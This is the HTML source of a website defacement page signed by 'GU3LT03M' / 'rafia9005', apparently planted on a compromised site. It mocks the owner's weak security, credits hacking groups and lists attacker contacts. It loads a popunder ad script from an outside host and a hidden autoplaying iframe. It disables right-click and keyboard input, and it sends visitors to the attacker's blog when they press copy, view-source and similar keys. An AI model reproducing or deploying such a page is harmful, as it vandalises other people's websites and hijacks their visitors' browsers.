<html lang="en">

<head>

<title>Touched By GU3LT03M</title>

<link rel="icon" href="https://2.bp.blogspot.com/-3H4Qx85an-c/WNcasRjCAvI/AAAAAAAAArk/TXl1Bd0xOpM2O763uxkBcWGCOf-Z4PcxgCLcB/s1600/FAC2017.png" type="image/x-icon">

<meta content='Touched By GU3LT03M'/>

<meta content='Touched By GU3LT03M'/>

<meta content='Touched By GU3LT03M'/>

<meta name="title" content="Touched By GU3LT03M">

<meta name="description" content="">

<meta name="keywords" content="Touched By GU3LT03M">

<meta name="googlebot" content="index,follow" />

<meta name="robots" content="all" />

<meta name="robots schedule" content="auto" />

<meta name="distribution" content="global" />

<meta contact='Touched By GU3LT03M'/>

Deface By rafia9005

<iframe width="1" height="0" src="http://www.youtube.com/embed/qMbKSXxPy7E?rel=0&autoplay=1"

frameborder="0" allowfullscreen></iframe>

</font>



    <script type="text/javascript">

var uid = '154035';

var wid = '328457';

</script>

<script type="text/javascript" src="//cdn.popcash.net/pop.js"></script>

</head>

<style type="text/css">

body {

	background: black;

	font-family: 'Courier new';

	text-align: center;

	color: black;

}

img{

	margin-top: 3%;

	width: 550px;

	opacity: 1;

}

#bg {

	margin: auto;

}

marquee{

	color: white;

}

</style>

<body>

<style>

body{

	background:white;

}

#och{

	font-family:Courier;

	color:white;

	position:absolute;

	left:0;

	left:0;

	right:0;

	top:10%;

}

#ochh{

	font-size:25px;

	font-weight:bold;

}

img {

    
	margin-top:-10px;
	height:200px;
	width:200px;

}

img:hover{	

	opacity:0

}

hr {

	width:250px;

}

a{

	color:white;

	text-decoration:none

}

a.hover{

	color:white;

}

</style>

</head>

<body><center><br>

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

<div id='och' align="center">

<div id='ochh'>

<center><img src="https://i.postimg.cc/rmWRxYCX/40da5e3de5890363df8e711971741b66.jpg"></center>

	<div id="contain">

<div id="bg">

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

      <font size='2'><font color="black">

         Thanks :<marquee width="45%" behavior="alternate" scrollamount="3"><font color="black">&nbsp; All Member Family Attack Cyber<font color="red">|</font> All Member 99Syndicate <font color="red">|</font> All Member Attacker Alone Cyber  &nbsp;</marquee>

      <br>

      <br>

<font color="red">Contact</font>: <a href="http://fb.com/noobdefacer"><font color="blue">rafia9005@my.id</a></font><br>

      <br />

<hr size="1">

Website mu terlalu lemah mas:v makan nya belas dulu sana

<hr size="1">

<a href="http://fb.com/rian.antonio25"><<input type="button" value="Iyah" onclick="alert('Nah pinter' :*');" style="font-size:1em;background:cyan"></a>

<a href="http://fb.com/rian.antonio25"><input type="button" value="Engga" onclick="alert('Tolol);" style="font-size:1em;background:yellow"></a>

      <br />

<script type="text/javascript"> //<![CDATA[

shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},

shortcut.add("esc",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+Shift+Del",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+F",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+W",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+U",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+A",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+S",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+X",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+C",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+V",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+Y",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

shortcut.add("Ctrl+Z",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});

//]]></script>

<div class="widget-content">

</div><style type="text/css">#info-teja {z-index: 1000;background:-moz-linear-gradient(top,  #1F2326,  #555);background: -webkit-gradient(linear, left top, left bottom, from(#1F2326), to(#555));box-shadow:-2px -2px 8px #000000, 2px 2px 20px #000000;-moz-box-shadow:-2px -2px 8px #000000, 2px 2px 20px #000000;-webkit-box-shadow:-2px -2px 8px #000000, 2px 2px 20px #000000;width:460px;position: fixed;top:150px;left:0;margin-left:-350px;border:1px solid #444;background-position:top right no-repeat;height:35px;font:11px Arial;color:#eee;border-top-right-radius:8px;border-bottom-right-radius:8px;-moz-border-radius-topright:8px;-moz-border-radius-bottomright:8px;-webkit-border-top-right-radius:8px;-webkit-border-bottom-right-radius:8px;}#info-teja{-o-transition: all 1s ease-in;-moz-transition: all 1s ease-in;-webkit-transition: all 1s ease-in;} #info-teja:hover{width:400px;opacity:1.0;margin-left:0;}.Tejainbox {border:1px solid #444;width:320px; margin:0px 90px 10px 10px;background:#000;color:#ffffff; border-radius :20px; padding:5px 0;-moz-border-radius:20px; -webkit-border-radius:20px;-o-transition:all 2s ease-in;-moz-transition:all 2s ease-in;-webkit-transition:all 2s ease-in;opacity:0.2;}.Tejainbox:hover{opacity:1.0;box-shadow:1px 1px 15px #000; -moz-box-shadow: 1px 1px 15px #000; -webkit-box-shadow: 1px 1px 15px #000;background: #000;}.Tejainbox2 {margin:5px 10px;padding:0px 8px 10px;color:#FFFFFF;overflow:hidden;height:370px;}.teja15 {border-radius:15px;-moz-border-radius:15px;-webkit-border-radius:15px;}.Teja2 ul.bom {margin: 0; padding: 0;}.Tejainbox2 li {margin-left:20px;}.Tejainbox2 li a {color: #FFFFF; line-height: 4px; font-size: 11px;font-weight: bold; text-decoration:none;}.Tejainbox2 li a:hover {color: red;text-shadow: 0 1px 1px #000;}.Tejainbox2 h2 { font: 18px Droid Serif;font-weight:bold;padding:0 8px;color: #fffff;text-shadow: 0px 1px 1px #ddd;border-bottom: 1px solid #000000;}.Tejatouch {font-size:21px;font-weight:bold;font-family:Arial Narrow;float:right;margin: 3px 10px 0 0;-o-transition: all 0.5s ease-out;-moz-transition: all 0.5s ease-out;-webkit-transition: all 0.5s ease-out;text-decoration:blink;}.Tejatouch:hover{-o-transform: scale(2) rotate(720deg) translate(0px);-moz-transform: scale(2) rotate(720deg) translate(0px);-webkit-transform: scale(2) rotate(720deg) translate(0px);color: #fffff;}</style><div id="info-teja"><span class="Tejatouch">FAC</span><div class="Tejainbox"><div class="Tejainbox2 teja15">

<h2>     Message :</h2>



 <span class="style4"><center><font color="black">.</font></center></span><br>

<span class="style4"><center><font color="red"> GU3LT03M Was Here </font></center></span><br>

<span class="style4"><center>Contact Me : facebook.com/noobdefacer</center></span><br>

<br>

<br><center>No System is Safe</center></span><br>

<span class="style4"><center>Your Security is low</center></span><br>

<span class="style4"><center>Please Check you security</center></span><br>

<span class="style4"><center>I Just testing Your web...</center></span><br>

<span class="style4"></span><br>

</div></div></div>

<br>

<br>

<br>

<br>

<br>

